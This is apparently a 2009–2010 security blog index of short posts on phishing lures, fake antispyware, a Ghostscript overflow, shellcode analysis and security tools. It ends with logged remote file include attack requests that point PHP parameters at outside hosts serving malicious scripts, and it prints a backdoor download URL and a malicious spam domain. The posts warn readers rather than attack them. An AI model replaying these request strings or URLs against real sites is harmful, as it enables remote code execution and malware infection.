blogs

Hacker Halted 2010

Discounted/free iPad offer for secgeeks visitors/users from Hacker Halted

Make plans now to attend the fifteenth annual Hacker Halted information security event - October 9-15 in Miami. The format includes a 4-day training Academy, followed by a 2-day conference on October 13-14 and 1-day of free Training (October 15) for all registrants. The two-day Conference features a comprehensive program presented in three tracks.

Register for the 2-day conference by August 31 and receive a FREE iPad onsite. No tricks or anything else to purchase.

How to Reset Windows Password with Windows Password Unlocker Standard?

Today many PC users easily forget the Windows passwords they set for their computers. Windows Password Unlocker Standard is designed to help users recover a forgotten Windows administrator password and other user passwords by burning a bootable CD/DVD. If you've forgotten your Windows password, you can try this Windows password recovery tool and follow the instructions below to recover your lost password.

Before starting, a bootable CD/DVD and a computer with a CD drive are required. (Internal and external CD drives are both OK.)

SecuritySuite malware removal

The most popular trend in Internet scams nowadays is fake and rogue antispyware. Such antispyware tries to convince users that they have plenty of infections to remove, showing basically the same alerts and nag screens as regular software products that combat viruses.

Alert : Fake Join my network on LinkedIn Emails

It seems that spammers have now started using the well-known LinkedIn.com website to spam users. I got a message from an unknown user asking me to connect to his network on LinkedIn. But when I looked carefully at the links, I found that the links in the email do not point to linkedin.com; they point to hxxp://lccvnvxx.info/

See the image below:
[Image: Fake LinkedIn]

So if you receive any such invitation to connect on LinkedIn, double-check it!!

Alert : Facebook - 10 lies girls tell guys.. not a good application to have!!

I use Facebook to connect with my friends. A few days back I received an application invite named "10 lies girls tell guys.." from a friend of mine. Since it was from a trusted person and the title is catchy, I decided to try this app.
But to my surprise, when I opened the application it gave a window with instructions like: press Ctrl+C, then press Alt+D, then press Ctrl+V, after that press Enter.

Spammers using google feed proxy to send spam!!

Spammers have now started using Google feed proxy links to avoid detection. Today I received the following email:

As you can see, it uses the following link:
http://feedproxy.google.com/~r/juy7/~3/cy83akSysSk
It's just a 301 redirect:

And the end result is the following:

Let's see what will be next!!

We are back!!

Secgeeks.com is back after having lots of downtime. We are receiving lots of traffic (means we are improving), so we are facing downtime with our hosts. Hopefully we will manage it now!!

RIP +Fravia

Some of you know him while some of you don't. For some it is news and for some it is not. +Fravia was an outstanding reverse engineer who inspired many people in reverse engineering. He passed away in May at the age of 56.
It is sad news.
Rest in Peace, +Fravia. You won't be forgotten.

Facebook's Tribute to Michael Jackson

Seems that people are using Michael Jackson's name to spread malware. I have received this mail:

This mail has a link, www.facebook.com, which actually points to:
hzzp://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe

which is a backdoor. See the full report here.

SecGeeks Alert : Fake Conflicker/Downadup removal tool spreading through email

I have received this mail today:
"Dear windows User,

Following a recent outbreak of the conflicker worm also known as downadup or trojan/brisv.a affecting over 15million Microsoft Windows users.. Merely
visiting a lot of popular sites could have gotten you infected. The virus exploited a vulnerability in all windows versions and products including the windows xp and vista operating systems. Researchers at Microsoft have
been working closely with Symantec, the creators of Norton antivirus and have come up with a removal tool for the conflicker virus. The average anti-virus

Ghostscript jbig2dec JBIG2 Processing Buffer Overflow Vulnerability

So after Adobe, it's in Ghostscript. There is a patch as follows:
699 if (exrunlength > params->SDNUMEXSYMS - j)

Here the vulnerable parameter is exrunlength; if it is large then there is an overflow.
Read more here.

How to analyze shellcode?

Often in exploit analysis we need to analyze the shellcode: what it does and how. There are many ways you can do it, but the simplest way is to use the following link:
http://sandsprite.com/shellcode_2_exe.php
Just copy and paste your shellcode and it will give you an exe containing the shellcode. Then you can simply run it in OllyDbg and step in. Sometimes shellcode is encrypted using XOR, but that is very simple to decode.
Hope it helps.

Cheers,
SecGeek

BBC hacks into thousands of PCs

I was reading this story. From the article:
"The BBC has deliberately hacked into 22,000 PCs to prove the power of botnets, and the damage that can be done with a network of compromised computers.

Click – BBC News’ technology programme – with the help of anti-virus company Prevx, took over thousands of computers in order to demonstrate a growing problem in the modern world.

[Quick Post] Facebook Striptease Dance Party

I received this mail:

The subject of the mail is catchy and anyone can get diverted to it. At first look the URL also seems to be coming from Facebook, but in fact it is not.
Look at the highlighted URL. That's the original URL. So beware of it.

Pcapr is good..

If you work with packets and network protocols, then I am sure you have lots of problems modifying them. Currently there is a limited number of tools that allow you to edit packets. Today I was playing with pcapr and I found it awesome. It has all the features that are required. You can upload packets, browse other dumps, modify dumps and download them. A good thing for your toolbox. You can access it here.

PHPBB after hack password analysis

I was reading this article at Darknet. It provides an analysis of phpBB user passwords, that is, what kind of passwords general users keep. The analysis has a strange result, stating that most of the passwords are very common and you can easily find them online here.
I have not used phpBB much and I don't remember if it enforces a minimal password length or complexity.

MetaScanner v1.1 released

In penetration testing we often need a tool that can scan the network and identify vulnerabilities. Here is one of them, called MetaScanner. You can download it from here.

Browser Fuzzer

I came to know about it today from the Full Disclosure list. You can download it here.

Google Prob? this site may harm your computer?

Strange, every site I am searching for right now on Google is coming up with the message "this site may harm your computer" in the search results. See below:

Is it only me, or are others also facing this problem?

Remote File Include Vulnerabilities getting exploited in wild?

Previously I posted an article on secgeeks.com regarding remote file include vulnerabilities. I am constantly seeing an increase in such requests. The following URLs contain so-called malicious files (adding them with the request file):
secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???

//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?

minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js

cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt????